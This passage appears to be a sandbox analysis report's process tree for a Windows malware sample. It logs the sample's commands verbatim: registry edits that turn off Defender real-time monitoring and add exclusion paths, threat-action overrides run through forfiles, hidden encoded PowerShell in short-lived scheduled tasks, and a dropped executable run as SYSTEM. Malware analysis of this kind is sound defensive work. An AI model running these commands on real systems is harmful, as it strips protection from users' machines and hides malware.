                                                      PID:2260
                                                • C:\Windows\SysWOW64\forfiles.exe
                                                  forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                  4⤵
                                                  • Indirect Command Execution
                                                  • System Location Discovery: System Language Discovery
                                                  PID:1660
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                    5⤵
                                                      PID:812
                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                        6⤵
                                                          PID:2188
                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                      4⤵
                                                      • Indirect Command Execution
                                                      PID:2524
                                                      • C:\Windows\SysWOW64\cmd.exe
                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                        5⤵
                                                          PID:1692
                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                            6⤵
                                                              PID:1360
                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                          forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                          4⤵
                                                          • Indirect Command Execution
                                                          PID:2060
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                            5⤵
                                                              PID:832
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                6⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Drops file in System32 directory
                                                                • Modifies data under HKEY_USERS
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                • Suspicious use of AdjustPrivilegeToken
                                                                PID:2308
                                                                • C:\Windows\SysWOW64\gpupdate.exe
                                                                  "C:\Windows\system32\gpupdate.exe" /force
                                                                  7⤵
                                                                    PID:1880
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "gonvAhOLb" /SC once /ST 02:09:30 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:2804
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "gonvAhOLb"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1848
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /DELETE /F /TN "gonvAhOLb"
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2512
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:2392
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:32
                                                              4⤵
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              • System Location Discovery: System Language Discovery
                                                              PID:1196
                                                          • C:\Windows\SysWOW64\cmd.exe
                                                            cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                            3⤵
                                                            • System Location Discovery: System Language Discovery
                                                            PID:1920
                                                            • C:\Windows\SysWOW64\reg.exe
                                                              REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /f /v "DisableRealtimeMonitoring" /t REG_DWORD /d 1 /reg:64
                                                              4⤵
                                                              • Modifies Windows Defender Real-time Protection settings
                                                              PID:348
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /CREATE /TN "geCuHCEnP" /SC once /ST 02:23:31 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
                                                            3⤵
                                                            • Scheduled Task/Job: Scheduled Task
                                                            PID:844
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /run /I /tn "geCuHCEnP"
                                                            3⤵
                                                              PID:2288
                                                            • C:\Windows\SysWOW64\schtasks.exe
                                                              schtasks /DELETE /F /TN "geCuHCEnP"
                                                              3⤵
                                                              • System Location Discovery: System Language Discovery
                                                              PID:2416
                                                            • C:\Windows\SysWOW64\forfiles.exe
                                                              "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True"
                                                              3⤵
                                                              • Indirect Command Execution
                                                              PID:2428
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                4⤵
                                                                  PID:812
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                    5⤵
                                                                    • Command and Scripting Interpreter: PowerShell
                                                                    • Drops file in System32 directory
                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:1660
                                                                    • C:\Windows\SysWOW64\Wbem\WMIC.exe
                                                                      "C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=wsf Force=True
                                                                      6⤵
                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                      PID:1536
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                3⤵
                                                                  PID:1256
                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                    REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                    4⤵
                                                                    • Windows security bypass
                                                                    PID:996
                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                  cmd /C REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                  3⤵
                                                                    PID:2224
                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                      REG ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                      4⤵
                                                                      • Windows security bypass
                                                                      PID:2552
                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                    cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                    3⤵
                                                                      PID:2228
                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
                                                                        4⤵
                                                                          PID:2168
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        cmd /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                        3⤵
                                                                          PID:680
                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                            REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
                                                                            4⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            PID:1852
                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                          cmd /C copy nul "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"
                                                                          3⤵
                                                                            PID:1868
                                                                          • C:\Windows\SysWOW64\wscript.exe
                                                                            wscript "C:\Windows\Temp\VLvKqTazivYGshTO\hPXXzVuo\UnZhnzDGBejjSizK.wsf"
                                                                            3⤵
                                                                            • System Location Discovery: System Language Discovery
                                                                            • Modifies data under HKEY_USERS
                                                                            PID:1136
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:1304
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              • System Location Discovery: System Language Discovery
                                                                              PID:876
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2292
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:484
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1468
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:2728
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:992
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
                                                                              4⤵
                                                                              • Windows security bypass
                                                                              PID:1720
                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
                                                                              4⤵
                                                                              • Windows security bypass
              • System Location Discovery: System Language Discovery
              PID:1716
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
              4⤵
              • Windows security bypass
              PID:1832
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
              4⤵
              • Windows security bypass
              PID:1032
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
              4⤵
              • Windows security bypass
              • System Location Discovery: System Language Discovery
              PID:1920
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
              4⤵
              • Windows security bypass
              PID:844
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
              4⤵
              • Windows security bypass
              • System Location Discovery: System Language Discovery
              PID:1576
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
              4⤵
              • Windows security bypass
              • System Location Discovery: System Language Discovery
              PID:1436
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
              4⤵
              • Windows security bypass
              PID:2440
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
              4⤵
              • Windows security bypass
              PID:1244
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
              4⤵
              • Windows security bypass
              PID:2952
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2236
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\EKfHLQOzikZzC" /t REG_DWORD /d 0 /reg:64
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1572
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2576
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\TcokmJWkeMGVDHpHTSR" /t REG_DWORD /d 0 /reg:64
              4⤵
              PID:932
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2548
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\kVyftiaSU" /t REG_DWORD /d 0 /reg:64
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2260
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:32
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2692
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\linOwUtCTeUn" /t REG_DWORD /d 0 /reg:64
              4⤵
              PID:2184
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2528
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\vECSWYHhNEBU2" /t REG_DWORD /d 0 /reg:64
              4⤵
              PID:2188
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2448
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\ProgramData\NUEAEvpmbtRdsZVB" /t REG_DWORD /d 0 /reg:64
              4⤵
              PID:1928
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2912
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64
              4⤵
              PID:2900
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2980
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Temp\ASUPEepcmoJTSZEuB" /t REG_DWORD /d 0 /reg:64
              4⤵
              • System Location Discovery: System Language Discovery
              PID:1952
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:32
              4⤵
              PID:2180
            • C:\Windows\SysWOW64\reg.exe
              "C:\Windows\System32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Windows\Temp\VLvKqTazivYGshTO" /t REG_DWORD /d 0 /reg:64
              4⤵
              • System Location Discovery: System Language Discovery
              PID:2580
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "geinNyBHk" /SC once /ST 03:19:51 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
          3⤵
          • System Location Discovery: System Language Discovery
          • Scheduled Task/Job: Scheduled Task
          PID:1236
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "geinNyBHk"
          3⤵
          PID:3020
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /DELETE /F /TN "geinNyBHk"
          3⤵
          PID:1896
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
          3⤵
          PID:2288
            • C:\Windows\SysWOW64\reg.exe
              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:32
              4⤵
              PID:1620
        • C:\Windows\SysWOW64\cmd.exe
          cmd /C REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1336
            • C:\Windows\SysWOW64\reg.exe
              REG DELETE "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection" /v "DisableRealtimeMonitoring" /f /reg:64
              4⤵
              PID:2932
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /CREATE /TN "cszbzSIAjSjUwyOsr" /SC once /ST 02:14:33 /RU "SYSTEM" /TR "\"C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe\" bH /sDpsdidAn 385121 /S" /V1 /F
          3⤵
          • Drops file in Windows directory
          • Scheduled Task/Job: Scheduled Task
          PID:2068
        • C:\Windows\SysWOW64\schtasks.exe
          schtasks /run /I /tn "cszbzSIAjSjUwyOsr"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:1676
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 1176 -s 628
          3⤵
          • Loads dropped DLL
          • Program crash
          PID:1956
    • C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe
      C:\Windows\Temp\VLvKqTazivYGshTO\WQsDeeZxhgbfQln\MjytQiW.exe bH /sDpsdidAn 385121 /S
      2⤵
      • Checks computer location settings
      • Executes dropped EXE
      • Drops Chrome extension
      • Drops file in System32 directory
      • Drops file in Program Files directory
      • Modifies data under HKEY_USERS
      • Suspicious behavior: EnumeratesProcesses
      PID:2300
        • C:\Windows\SysWOW64\cmd.exe
          "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
          3⤵
          • System Location Discovery: System Language Discovery
          PID:2276
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
              4⤵
              • Indirect Command Execution
              • System Location Discovery: System Language Discovery
              PID:1696
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                  5⤵
                  PID:2576
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                      6⤵
                      • System Location Discovery: System Language Discovery
                      PID:2696
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
              4⤵
              • Indirect Command Execution
              PID:1120
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                  5⤵
                  PID:1916
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                      6⤵
                      PID:2608
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
              4⤵
              • Indirect Command Execution
              PID:684
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                  5⤵
                  • System Location Discovery: System Language Discovery
                  PID:2336
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                      6⤵
                      PID:2548
            • C:\Windows\SysWOW64\forfiles.exe
              forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
              4⤵
              • Indirect Command Execution
              PID:2524
                • C:\Windows\SysWOW64\cmd.exe
                  /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                  5⤵
                  PID:2508
                    • \??\c:\windows\SysWOW64\reg.exe
                      reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                                                              6⤵
                                                                                                                                PID:2260
                                                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                                                            4⤵
                                                                                                                            • Indirect Command Execution
                                                                                                                            PID:2976
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                                              5⤵
                                                                                                                                PID:2788
                                                                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
